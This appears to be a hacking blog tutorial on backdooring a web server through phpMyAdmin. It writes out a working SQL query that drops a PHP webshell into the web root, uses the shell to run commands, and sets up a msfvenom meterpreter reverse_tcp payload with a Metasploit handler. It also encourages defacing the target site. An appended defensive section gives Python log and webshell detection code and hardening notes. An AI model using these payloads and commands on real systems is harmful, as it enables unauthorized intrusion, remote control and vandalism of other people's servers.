Backdoor with phpMyAdmin

“Scenario”: So, you found your “target’s” website, but you notice there isn’t much you can work with here. Using a URL fuzzer, you found a “phpMyAdmin” path and, surprisingly, the admin used a weak password (or some other method).

You’re logged into phpMyAdmin with the administrator account. Head over to the SQL tab “This will let you run SQL query/queries on the server” and use this code “Or any code of your choice!” and press Go.

SELECT "<?php echo '<pre>';echo shell_exec($_REQUEST['mrjsec']);echo '</pre>'; ?>"
INTO OUTFILE '/var/www/html/name.php'

Now go to your .php file (URL-wise); in this scenario I have named it name.php.

You won’t see anything on this page “that’s normal, we’re all empty inside!”. Now here’s the magic part. At the end of the .php URL path add this “?mrjsec=*Your command here*”; now you have a shell within the server, where you can call commands such as ls, whoami, rm, wget and so on.

And from here you can even deface the site if that’s what you want. And that ends that!

Or maybe you want to go further and get a Metasploit reverse TCP shell on the system itself?

Now we’re talking! First, we need to identify what operating system is running; it could be Linux or Windows. However, in this scenario it’s Linux, and you can find this out by merely performing “?mrjsec=uname”, which returns “Linux4.4.0-140-generic x86_64 x86_64 x86_64 GNU/Linux”.

Now it’s time to craft the Metasploit payload using msfvenom. If you’re unsure what payload you would need, just run “msfvenom --list payloads”; this will show all the available payloads, just pick the one you need.

“Since this scenario is based around Linux, I will keep it Linux based, just remember there are so many different opportunities. Always think outside the box!”

Create the payload you need.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=.31 LPORT=5721 -f elf > file

Now you will need to upload it somewhere that offers direct downloading. In this scenario the attacker has apache2 installed and will be hosting the file from their own server.

Go back to the target and using the first shell, we will use wget to get our shell onto the system.

Using the “ls” command we can see the file is in place. Now we just need to make it executable, simply by using chmod.

name.php?mrjsec=chmod +x file

Before we even run the file, let’s make sure our Metasploit handler is running and configured correctly.

msfconsole
use exploit/multi/handler

And don’t forget to set the Payload, LHOST and RHOST!

set payload linux/x86/meterpreter/reverse_tcp
set LHOST .31
set LPORT 5721

You can use “show options”; this will show you what settings are required for this payload (or any others).

Now just run exploit, and we can leave it. Or if you wish to background it, just do exploit -j.

Back on the target’s site, we just need to run the file. From the URL we input “./file” and that’s it.

And if we head back to our Metasploit, we can see our file was a success, and we now have a better foothold within the system. What you do from here is your business.

But for me… I think a better-looking homepage is needed!

…. Well, I think it’s better anyway….


I hope you have enjoyed my little guide here. Remember, this guide won’t work 100%, so play around with it, and always think outside the box.

Enjoy!
-MrJSec ❤
“Made for educational purposes Only.”
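
Seen from the defending side, every step above leaves a trail: the commands travel as a query parameter to a .php file, and the dropped file feeds request input straight into shell_exec. The following is an added example, not part of the original guide, that flags both; the log lines are constructed, and the function names and command list are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Commands the walkthrough sends through the shell parameter (assumed watch list).
COMMANDS = {"ls", "whoami", "rm", "wget", "uname", "chmod"}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# PHP that passes a request superglobal straight into a command-execution function.
WEBSHELL_RE = re.compile(
    r"\b(?:shell_exec|system|passthru|exec|popen|proc_open)\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b")

def looks_like_command(value):
    """True if a parameter value starts with a watched binary or a ./relative path."""
    tokens = value.split()
    return bool(tokens) and (tokens[0] in COMMANDS or tokens[0].startswith("./"))

def suspicious_requests(log_text):
    """Return (client, path, parameter, value) for .php requests carrying a command."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(".php"):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if looks_like_command(value):
                hits.append((client, url.path, name, value))
    return hits

def is_webshell_source(php_source):
    """True if the PHP source feeds request input into command execution."""
    return bool(WEBSHELL_RE.search(php_source))

# Constructed access-log sample (combined format); addresses and times are made up.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Jan/2019:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2019:10:02:11 +0000] "GET /name.php?mrjsec=uname HTTP/1.1" 200 74 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2019:10:03:40 +0000] "GET /name.php?mrjsec=chmod%20%2Bx%20file HTTP/1.1" 200 11 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2019:10:04:05 +0000] "GET /name.php?mrjsec=./file HTTP/1.1" 200 11 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2019:10:05:00 +0000] "GET /search.php?q=who+am+i+to+judge HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""
SAMPLE_PHP = "<?php echo '<pre>';echo shell_exec($_REQUEST['mrjsec']);echo '</pre>'; ?>"

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
    print("webshell pattern in file:", is_webshell_source(SAMPLE_PHP))
```

The dropped file is written by the database server itself, so the INTO OUTFILE step only succeeds when the MySQL account holds the FILE privilege, secure_file_priv permits the path, and the mysqld user can write to the web root; removing any one of these blocks it.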
